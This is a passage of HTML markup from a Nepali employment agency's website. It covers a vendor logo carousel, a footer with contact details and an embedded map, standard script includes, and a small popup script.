              Lorem, ipsum dolor sit amet consectetur adipisicing elit. Modi
              enim ex reiciendis, hic voluptate ratione eligendi amet minima.
            </div>
          </div>
        </div>
      </div>
    </div> -->
  <!-- Testimonial End -->

  <!-- Vendor Start -->
  <div class="container-fluid py-5 wow fadeInUp" data-wow-delay="0.1s">
    <div class="container mb-5">
      <div class="bg-white">
        <h3 class="fw-bold text-dark text-uppercase">VENDORS</h3>
        <div class="owl-carousel vendor-carousel">
          <img src="img/vendor-1.png" alt="Vendor Name" />
          <img src="img/vendor-2.png" alt="Vendor Name" />
          <img src="img/vendor-3.png" alt="Vendor Name" />
          <img src="img/vendor-4.png" alt="Vendor Name" />
          <img src="img/vendor-5.png" alt="Vendor Name" />
          <img src="img/vendor-6.png" alt="Vendor Name" />
          <img src="img/vendor-7.png" alt="Vendor Name" />
          <img src="img/vendor-8.png" alt="Vendor Name" />
          <img src="img/vendor-9.png" alt="Vendor Name" />
        </div>
      </div>
    </div>
  </div>
  <!-- Vendor End -->

  <!-- Footer Start -->
  <hr />
  <div class="container-fluid bg-white text-dark mt-0 wow fadeInUp" data-wow-delay="0.1s">
    <div class="container">
      <div class="row">
        <!-- FooterABOUT -->
        <div class="col-lg-3 col-md-6 col-sm-6 footer-about">
          <div class="d-flex flex-column align-items-center justify-content-start text-center h-100 mt-5">
            <a href="index.html" class="navbar-brand">
              <h1 class="m-0 text-white">
                <img class="w-100" src="img/logo.png" alt="" />
              </h1>
            </a>
            <p class="mt-3 mb-4">
              Amity Global Employment Services Pvt.Ltd. is the leading
              employment agency in Nepal since almost 2 decades engaged in the
              supply of human resources in many parts of the world.
            </p>
       
          </div>
        </div>

        <!-- Footer ABout END -->

        <!-- FOOTER CONTACT -->
        <div class="col-lg-3 col-md-6 col-sm-6 pt-5">
          <div class="section-title section-title-sm position-relative pb-3 mb-4">
            <h3 class="text-dark mb-0">Contact</h3>
          </div>
          <div class="d-flex mb-2">
            <i class="bi bi-geo-alt text-dark me-2"></i>
            <p class="mb-0">Ranibari Marga-29, Samakhusi Kathmandu, Nepal</p>
          </div>
          <div class="d-flex mb-2">
            <i class="bi bi-envelope-open text-dark me-2"></i>
            <p class="mb-0">info@amityglobalgroup.com</p>
          </div>
          <div class="d-flex mb-2">
            <i class="bi bi-telephone text-dark me-2"></i>
            <p class="mb-0">+977-01-4970366/ 01-4970466</p>
          </div>
          <div class="d-flex mt-4">
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square me-2"
              href="https://twitter.com/amity_global"><i class="fab fa-twitter fw-normal"></i></a>
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square me-2"
              href="https://www.facebook.com/amityglobalemploymentservices"><i
                class="fab fa-facebook-f fw-normal"></i></a>
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square me-2" href="#"><i
                class="fab fa-linkedin-in fw-normal"></i></a>
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square" href="#"><i
                class="fab fa-instagram fw-normal"></i></a>
          </div>
        </div>
        <!-- FOOTER CONTACT END -->

        <!-- FOOTER QUICK LINKS -->
        <div class="col-lg-3 col-md-6 col-sm-6 pt-0 pt-lg-5 mb-5">
          <div class="section-title section-title-sm position-relative pb-3 mb-4">
            <h3 class="text-dark mb-0">Quick Links</h3>
          </div>
          <div class="link-animated d-flex flex-column justify-content-start">
            <a class="text-dark mb-2" href="index.html"><i class="bi bi-arrow-right text-dark me-2"></i>Home</a>
            <a class="text-dark mb-2" href="about.html"><i class="bi bi-arrow-right text-dark me-2"></i>About Us</a>
            <a class="text-dark mb-2" href="documents.html"><i
                class="bi bi-arrow-right text-dark me-2"></i>Documents</a>
            <a class="text-dark mb-2" href="jobs-category.html"><i class="bi bi-arrow-right text-dark me-2"></i>Job
              Seeker</a>
            <a class="text-dark mb-2" href="chart.html"><i class="bi bi-arrow-right text-dark me-2"></i>Organizational
              Chart</a>
            <a class="text-dark" href="contact.html"><i class="bi bi-arrow-right text-dark me-2"></i>Contact Us</a>
          </div>
        </div>

        <!-- FOOTER QUICKLINS END -->

        <!-- FOOTER MAP -->

        <div class="col-lg-3 col-md-6 col-sm-6 pt-0 pt-lg-5 mb-5">
          <div class="section-title section-title-sm position-relative pb-3 mb-4">
            <h3 class="text-dark mb-0">Map</h3>
          </div>
          <div class="link-animated d-flex flex-column justify-content-start">
            <iframe
              src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2357.075124405027!2d85.32286374645743!3d27.728945989500744!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x39eb19370d71a32d%3A0xc3355d3abf9f8f90!2sAmity%20Global%20Employment%20Services!5e0!3m2!1sen!2snp!4v1687767746347!5m2!1sen!2snp"
              width="200" height="200" style="border: 0" class="w-100" loading="lazy"
              referrerpolicy="no-referrer-when-downgrade"></iframe>
          </div>
        </div>

        <!-- FOOTER MAP END -->
      </div>
    </div>
  </div>
  <div class="container-fluid text-dark" style="background: #eef9ff">
    <div class="container text-center">
      <div class="row justify-content-end">
        <div class="col-lg-8 col-md-6">
          <div class="d-flex align-items-center justify-content-center" style="height: 75px">
            <p class="mb-0">
              &copy;
              <a class="text-dark border-bottom" href="#">Amity Global Group | </a>© 2022 All Rights Reserved

              <!--/*** This template is free as long as you keep the footer author’s credit link/attribution link/backlink. If you'd like to use the template without the footer author’s credit link/attribution link/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->
              Designed by
              <a class="text-dark border-bottom" href="https://radiantnepal.com/">Radiant Infotech</a>
            </p>
          </div>
        </div>
      </div>
    </div>
  </div>
  <!-- Footer End -->

  <!-- Back to Top -->
  <a href="#" class="btn btn-lg btn-primary btn-lg-square rounded back-to-top"><i class="bi bi-arrow-up"></i></a>

  <!-- JavaScript Libraries -->
  <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>
  <script src="lib/wow/wow.min.js"></script>
  <script src="lib/easing/easing.min.js"></script>
  <script src="lib/waypoints/waypoints.min.js"></script>
  <script src="lib/counterup/counterup.min.js"></script>
  <script src="lib/owlcarousel/owl.carousel.min.js"></script>

  <!-- Template Javascript -->
  <script src="js/main.js"></script>

  <script>
    var popup = document.getElementById("popup");
    window.addEventListener("load", () => {
      popup.style.display = "flex";
    });

    popup.addEventListener("click", () => {
      popup.style.display = "none";
    });
  </script>
</body>

</html>